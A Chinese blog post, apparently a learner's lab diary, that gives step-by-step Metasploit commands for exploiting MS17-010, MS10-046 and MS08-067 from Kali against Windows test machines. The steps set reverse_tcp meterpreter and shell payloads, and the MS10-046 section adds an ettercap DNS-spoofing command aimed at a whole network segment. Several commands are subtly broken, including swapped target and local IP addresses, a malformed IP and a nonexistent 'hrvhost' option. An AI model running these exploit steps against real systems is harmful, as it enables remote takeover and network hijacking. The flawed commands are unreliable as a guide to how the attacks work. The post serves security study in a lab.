漏洞利用

2020年1月7日
好了,到了第二天,早上起来的时候心情就是那么的激动
为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了!

今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下:

ms17-010,ms08-067,ms10-046漏洞利用

一. ms17-010
1.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码 漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。

2.实验环境
攻击机:Kali
IP:192.168.65.133      
靶机:Windows 7 x64
IP:192.168.65.132

3.实验步骤
启动metasploit
    Msfconsole
查看kali IP 
    Ifconfig
查看靶机 IP
    Ipconfig
搜索ms17-010
    Search ms17-010
找到ms17-010攻击模块
    Use 模块名
设置靶机IP地址
    Set rhost 192.168.65.133 
设置本地IP地址
    set lhost 192.168.65.132
设置靶机端口
    Set rport 445
设置payload(攻击载荷)
    Set payload windows/x64/meterpreter/reverse_tcp
攻击
    run
显示meterpreter>则表示攻击成功

二. ms10-046
1.漏洞成因:Windows支持使用快捷方式或LNK文件,LNK文件时指向本地文件的引用,点击LNK文件 与点击快捷方式所制定的目标具有相同效果。Windows没有正确处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或者远程文件系统,光驱或者 其他位置,使用资源管理器查看了LNK文件所在的文字就足以触发这个漏洞。

2.实验环境
攻击机:Kali
IP:192.168.65.133      
靶机:Windows xp
IP:192.168.65.134

3.实验步骤
启动metasploit
    Msfconsole
查看kali IP 
    Ifconfig
查看靶机 IP
    Ipconfig
搜索ms10-046
    Search ms10-046
找到ms10-046攻击模块
    Use 模块名
设置靶机IP地址
    Set rhost 192.168.65.134
设置本地IP地址
    set lhost i192.168.65.133
设置本机监听ip地址
    set hrvhost 192.168.65.133
设置靶机端口
    Set rport 445
设置payload(攻击载荷)
    Set payload windows/shell/reverse_tcp
攻击
    run
开启ettercap劫持整个网段
ettercap -T -q -i eth0 -P dns_spoof 

三. ms08-067
1.漏洞成因: Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过 发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。
2.实验环境
攻击机:Kali
IP:192.168.65.133
靶机:Windows xp
IP:192.168.65.134

3.实验步骤
启动metasploit
    Msfconsole
查看kali IP 
    Ifconfig
查看靶机 IP
    Ipconfig
搜索ms08-067
    Search ms08-067
找到ms08-067攻击模块
    Use 模块名
设置靶机IP地址
    Set rhost 192.168.65.134
设置本地IP地址
    set lhost 192.168.65.133
设置靶机端口
    Set rport 445
设置payload(攻击载荷)
    Set payload windows/meterpreter/reverse_tcp
攻击
    run
进入shell
    shell
成功利用
发布了9 篇原创文章 · 获赞 0 · 访问量 164

猜你喜欢

转载自blog.csdn.net/weixin_43227251/article/details/103953898
今日推荐